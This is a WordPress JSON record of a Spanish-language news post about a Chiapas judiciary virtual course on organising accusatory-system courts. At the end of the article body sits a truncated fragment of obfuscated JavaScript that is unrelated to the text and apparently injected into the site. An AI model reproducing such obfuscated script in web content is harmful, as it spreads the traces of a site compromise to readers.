{"id":5274,"date":"2022-09-21T02:57:36","date_gmt":"2022-09-21T02:57:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5274"},"modified":"2022-09-21T02:57:37","modified_gmt":"2022-09-21T02:57:37","slug":"continua-poder-judicial-capacitacion-en-el-sistema-acusatorio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5274","title":{"rendered":"Contin\u00faa Poder Judicial capacitaci\u00f3n en el Sistema Acusatorio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"659\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0048-1024x659.jpg\" alt=\"\" class=\"wp-image-5275\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0048-1024x659.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0048-300x193.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0048-768x494.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0048.jpg 1175w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>20 de septiembre del. 2022. Tuxtla Guti\u00e9rrez; Chiapas.- Como parte del programa de capacitaci\u00f3n y actualizaci\u00f3n que desarrolla el Poder Judicial del Estado, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, se llev\u00f3 a cabo el curso Organizaci\u00f3n de los \u00d3rganos Jurisdiccionales del Sistema Acusatorio, disertado por el juez de Control del Sistema Procesal Acusatorio del Tribunal de Justicia de la Ciudad de M\u00e9xico, Agust\u00edn Moreno Gaspar.<\/p>\n\n\n\n<p>Este curso que se realiz\u00f3 en modalidad virtual, a trav\u00e9s de la plataforma Telmex, se desarroll\u00f3 en coordinaci\u00f3n con el Instituto de Estudios Judiciales del Poder Judicial de la Ciudad de M\u00e9xico, estuvo dirigido a las y los magistrados, juezas y jueces que se encuentran adscritos en los diversos Distritos Judiciales que conforman esta casa de la justicia.<\/p>\n\n\n\n<p>Al iniciar su disertaci\u00f3n el juez Agust\u00edn Moreno Gaspar, agradeci\u00f3 al magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, la invitaci\u00f3n a participar en esta actividad que comprendi\u00f3 una charla amena para explicar la organizaci\u00f3n de los \u00f3rganos jurisdiccionales de la Ciudad de M\u00e9xico.<\/p>\n\n\n\n<p>Con estos cursos virtuales, el Poder Judicial del Estado, confirma su compromiso para continuar realizando cursos, capacitaciones, ponencias, talleres y conversatorios que abonen a la actualizaci\u00f3n y profesionalizaci\u00f3n de las y los servidores p\u00fablicos, y al fortalecimiento de la impartici\u00f3n de justicia en nuestro estado.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;<\/p>\n\n\n\n<p>: \/poderjudicial.chiapas&nbsp;t&nbsp;<\/p>\n\n\n\n<p>: @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>20 de septiembre del. 2022. Tuxtla Guti\u00e9rrez; Chiapas.- Como parte del programa de capacitaci\u00f3n y actualizaci\u00f3n que desarrolla el Poder Judicial del Estado, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, se llev\u00f3 a cabo el curso Organizaci\u00f3n de los \u00d3rganos Jurisdiccionales del Sistema Acusatorio, disertado por el juez de Control del Sistema &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5275,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5274","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5274"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5274\/revisions"}],"predecessor-version":[{"id":5276,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5274\/revisions\/5276"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5275"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}